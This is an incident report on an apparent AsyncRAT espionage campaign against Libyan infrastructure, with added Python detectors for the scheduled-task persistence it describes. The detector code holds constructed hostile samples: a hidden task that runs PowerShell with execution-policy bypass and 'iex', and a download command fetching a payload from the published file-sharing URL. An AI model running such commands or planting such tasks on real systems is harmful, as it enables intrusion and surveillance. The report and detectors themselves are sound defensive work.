The modular backdoor AsyncRAT was deployed on targeted networks.
# Incident Report: Long-running Espionage Campaign Targeting Libyan Infrastructure
## Executive Summary
A sustained cyber-espionage campaign targeted critical Libyan organizations, including an oil refinery, a telecommunications provider, and a state institution, between November 2025 and February 2026. The attackers deployed the modular AsyncRAT backdoor using highly localized spear-phishing lures to facilitate long-term intelligence gathering. The campaign is suspected to be state-sponsored due to the strategic nature of the targets and the use of current geopolitical events as infection bait.
## Incident Details
- **Discovery Date:** February 2026
- **Incident Date:** November 2025 – February 2026 (Potential activity dating back to April 2025)
- **Affected Organizations:** An unnamed Libyan oil refinery, a telecommunications provider, and a state institution
- **Sector:** Energy (Oil & Gas), Telecommunications, Government
- **Geography:** Libya
## Timeline of Events
### Initial Access
- **Date/Time:** November 2025 (Initial identified compromise)
- **Vector:** Spear-phishing emails
- **Details:** Attackers used "news-of-the-day" lure documents, specifically referencing the assassination of Saif al-Gaddafi and other Libya-specific political themes, to trick users into executing malicious files.
### Lateral Movement
- **Details:** The actors maintained a presence on the oil refinery's network for several months (November to February). The report does not document a specific lateral movement technique (such as SMB or RDP abuse); what it describes is sustained AsyncRAT access across the targeted environments, with any movement between hosts driven by the operator through the RAT.
### Data Exfiltration/Impact
- **Details:** As a remote access trojan (RAT), AsyncRAT was used for intelligence gathering. The capabilities observed were keylogging, screen capture, and remote command execution, consistent with monitoring internal communications and operational data rather than with destructive activity.
### Detection & Response
- **How it was discovered:** Security researchers identified malicious files on compromised networks and correlated them with related samples on VirusTotal.
- **Response actions taken:** Investigation by threat intelligence teams; deployment of protections via Symantec and Carbon Black products.
## Attack Methodology
- **Initial Access:** Spear-phishing with localized lures (e.g., *Leaked CCTV footage - Saif al-Gaddafi's assassination.gz*).
- **Persistence:** Creation of a scheduled task named 'devil' using a malicious XML configuration (*Googless.xml*).
- **Privilege Escalation:** Not documented in the report. Nothing indicates the actor escalated privileges; the scheduled-task persistence described here can be registered with `schtasks.exe /Create /XML` in the context of the user who ran the lure, without elevation.
- **Defense Evasion:** Hosting of payloads on a legitimate file-sharing service (Kraken Files) rather than attacker-owned infrastructure; a VBS downloader and PowerShell stages that rely on the victim opening the lure rather than on an exploit; payloads served under innocuous filenames (e.g., a PowerShell script retrieved as *image.png*).
- **Credential Access:** Keylogging functionality within AsyncRAT.
- **Discovery:** System and network reconnaissance via AsyncRAT modular commands.
- **Lateral Movement:** Not detailed in the report; any movement between hosts was operator-driven through the AsyncRAT command-and-control (C2) interface.
- **Collection:** Screen captures and keystroke logging.
- **Exfiltration:** Exfiltration of gathered intelligence to external C2 infrastructure.
- **Impact:** Long-term espionage and potential for operational disruption of energy supplies.
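To show what the persistence step above looks like from the defender's side, here is an added example (not code from the report or from the researchers who published it) that triages Windows Task Scheduler XML definitions of the kind `Googless.xml` would be. The contents of the real Googless.xml are not published, so the two task definitions below are constructed; the list of user-writable directories, the stealth-flag patterns, and the `iex`-based argument are assumptions made for this example.

```python
"""Triage Windows Task Scheduler XML definitions for the persistence pattern
in the report (schtasks /Create /XML from a public user folder).
Added example: the two task definitions below are constructed, not the
real Googless.xml, whose contents the report does not publish."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
IOC_TASK_NAMES = {"devil"}
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Directories an unprivileged user can write to (assumption for this example).
USER_WRITABLE = re.compile(r"\\(?:users\\public|appdata|temp|programdata)\\", re.I)
STEALTH_FLAGS = re.compile(r"-(?:ep|executionpolicy)\s+bypass|-(?:w|windowstyle)\s+hidden", re.I)

# Constructed: what a task like the reported "devil" task could look like.
# Real task files under C:\Windows\System32\Tasks are UTF-16; ET.parse() handles
# that when reading from disk, so the XML declaration is omitted here.
MALICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval></Repetition>
      <StartBoundary>2026-02-15T10:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -ep bypass -c "iex (gc C:\Users\Public\Music\image.png -raw)"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2026-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\backup.exe</Command><Arguments>/quiet</Arguments></Exec>
  </Actions>
</Task>"""


def triage_task(xml_text, task_name):
    """Return a list of findings for one task definition (empty list = nothing notable)."""
    root = ET.fromstring(xml_text)
    findings = []
    if task_name.lower() in IOC_TASK_NAMES:
        findings.append(f"task name '{task_name}' matches a published IoC")
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", "", NS).strip()
        args = ex.findtext("t:Arguments", "", NS).strip()
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_ENGINES:
            findings.append(f"action runs script engine {exe}")
        if USER_WRITABLE.search(cmd + " " + args):
            findings.append("action references a user-writable directory")
        if STEALTH_FLAGS.search(args):
            findings.append("arguments hide the window or bypass execution policy")
    if root.findtext("t:Settings/t:Hidden", "", NS).strip().lower() == "true":
        findings.append("task is marked hidden")
    interval = root.findtext(".//t:Triggers//t:Repetition/t:Interval", "", NS)
    if interval:
        findings.append(f"task re-runs every {interval}")
    return findings


if __name__ == "__main__":
    for name, xml in (("devil", MALICIOUS_TASK_XML), ("VendorBackup", BENIGN_TASK_XML)):
        print(name, "->", triage_task(xml, name) or "clean")
```

On a live host the same function can be run over every file under `C:\Windows\System32\Tasks` (the task name is the file name relative to that folder), which catches tasks registered via `/XML` even when process telemetry of the original `schtasks.exe` execution has already rolled over.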
## Impact Assessment
- **Financial:** Undisclosed; potential for massive impact if oil production (1.37M barrels/day) was disrupted.
- **Data Breach:** Compromise of sensitive state and corporate communications; volume unknown.
- **Operational:** Sustained unauthorized access to the networks of critical infrastructure operators; the report does not state whether control or monitoring (OT) networks were reached.
- **Reputational:** High impact on state institutions and national security entities.
## Indicators of Compromise
- **Network indicators:**
- `https://hs8.krakenfiles[.]com/uploads/15-02-2026/JCaF7rrPQm/image.png`
- **File indicators (Hashes):**
- `0f3344e672d1ea6cde382b68b27063ed766fced717e9f5f2e15e6c79ce0737f7` (AsyncRAT)
- `c3eef096073dd0873a821c35dd2e7eaf391863264ab72e1b91f2ca73218c2d04` (VBS Downloader)
- `ad4e27fe06fae2325faa2a00be7b41f40aa9c63fe79713597b3330ad7e583ca8` (Names_libya444.vbs)
- **Behavioral indicators:**
- Creation of scheduled task named `devil`.
- File path (as observed, with the mixed separator): `C:\Users\Public\Music\/Googless.xml`.
- Execution of `schtasks.exe /Create` with the `/XML` switch loading the task definition from that path.
## Response Actions
- **Containment measures:** Isolation of infected hosts identified via the "devil" scheduled task.
- **Eradication steps:** Removal of malicious VBS and PowerShell scripts; termination of AsyncRAT processes.
- **Recovery actions:** Hardening of email gateways and monitoring for specific Libya-themed phishing lures.
## Lessons Learned
- **Exploitation of Geopolitics:** Attackers successfully capitalized on local political instability and high-profile assassinations to increase the "click rate" of phishing.
- **Living off the Land:** The use of built-in Windows tools (PowerShell, Schtasks, VBS) allowed the threat actor to remain undetected on some networks for over three months.
- **Public Tooling:** The use of AsyncRAT (a public tool) made attribution difficult, demonstrating how state-sponsored actors use "commodity" malware to maintain plausible deniability.
## Recommendations
- **Email Security:** Implement advanced threat protection (ATP) to scan for malicious VBS/PowerShell attachments and URLs within compressed files (.gz).
- **Endpoint Monitoring:** Monitor for the creation of unusual scheduled tasks—particularly those using the `/XML` flag to load configurations from public user folders.
- **User Training:** Conduct localized security awareness training focusing on how threat actors use national news events as social engineering lures.
- **Network Filtering:** Restrict access to unauthorized file-sharing sites (like Kraken Files) from corporate workstations.
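As an added example (not code from the original report or from the researchers behind it), the following Python applies the behavioral and file indicators from the Indicators of Compromise section together with the endpoint-monitoring recommendation above to process-creation telemetry such as Sysmon Event ID 1. The event schema, rule names and sample events are constructed; the sample events reproduce the task name, XML path, hashes and download URL the report publishes, and the account name, parent processes and benign events are invented.

```python
"""Apply the report's behavioral and file indicators to process-creation
telemetry (Sysmon Event ID 1 or an EDR equivalent).
Added example: the event schema, rule names and sample events are constructed;
the sample events reproduce the task name, XML path, hashes and download URL
the report publishes."""
import re
import shlex
from dataclasses import dataclass

# SHA-256 file indicators published in the report.
IOC_HASHES = {
    "0f3344e672d1ea6cde382b68b27063ed766fced717e9f5f2e15e6c79ce0737f7": "AsyncRAT",
    "c3eef096073dd0873a821c35dd2e7eaf391863264ab72e1b91f2ca73218c2d04": "VBS downloader",
    "ad4e27fe06fae2325faa2a00be7b41f40aa9c63fe79713597b3330ad7e583ca8": "Names_libya444.vbs",
}
IOC_TASK_NAMES = {"devil"}
IOC_DOMAINS = ("krakenfiles.com",)
# The reported path mixes separators (C:\Users\Public\Music\/Googless.xml),
# so accept either slash after "Public".
PUBLIC_DIR = re.compile(r"^c:\\users\\public[\\/]", re.I)
# A URL whose path ends in an image extension but is fetched by a shell.
IMAGE_URL = re.compile(r"https?://\S+?\.(?:png|jpe?g|gif)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    cmdline: str
    parent_image: str
    sha256: str = ""    # hash of the image, when the sensor records it


@dataclass
class Alert:
    rule: str
    detail: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _switch_value(cmdline, switch):
    """Return the argument that follows a schtasks switch such as /XML or /TN."""
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() == switch:
            return toks[i + 1]
    return None


def analyze(events):
    """Run every rule over every event and return the alerts raised."""
    alerts = []
    for ev in events:
        img, parent, cl = _basename(ev.image), _basename(ev.parent_image), ev.cmdline.lower()
        if ev.sha256.lower() in IOC_HASHES:
            alerts.append(Alert("ioc_hash", IOC_HASHES[ev.sha256.lower()] + ": " + ev.image))
        if img == "schtasks.exe" and "/create" in cl:
            xml = _switch_value(ev.cmdline, "/xml")
            name = _switch_value(ev.cmdline, "/tn")
            if xml and PUBLIC_DIR.match(xml):
                alerts.append(Alert("schtasks_xml_public_dir", xml))
            if name and name.lower() in IOC_TASK_NAMES:
                alerts.append(Alert("ioc_task_name", name))
        if img in SHELLS and parent in SCRIPT_HOSTS:
            alerts.append(Alert("script_host_spawned_shell", parent + " -> " + img))
        if img in SHELLS and any(d in cl for d in IOC_DOMAINS):
            alerts.append(Alert("ioc_domain_in_cmdline", ev.cmdline))
        m = IMAGE_URL.search(ev.cmdline) if img in SHELLS else None
        if m:
            alerts.append(Alert("image_named_payload_fetch", m.group(0)))
    return alerts


# Constructed sample telemetry: the first three events are the reported chain
# (VBS lure -> hidden PowerShell download -> schtasks /XML); the last two are benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\Names_libya444.vbs"',
              r"C:\Windows\explorer.exe",
              "ad4e27fe06fae2325faa2a00be7b41f40aa9c63fe79713597b3330ad7e583ca8"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "iwr https://hs8.krakenfiles.com/uploads/15-02-2026/JCaF7rrPQm/image.png -OutFile C:\Users\Public\Music\image.png"',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN devil /XML "C:\Users\Public\Music\Googless.xml" /F',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "VendorBackup" /XML "C:\Program Files\Vendor\backup.xml"',
              r"C:\Windows\System32\msiexec.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile Get-Process",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
```

The hash and task-name rules are exact-match and will stop firing as soon as the actor rebuilds the payload or renames the task; the `schtasks_xml_public_dir`, `script_host_spawned_shell` and `image_named_payload_fetch` rules key on the technique instead and are the ones worth keeping as standing detections.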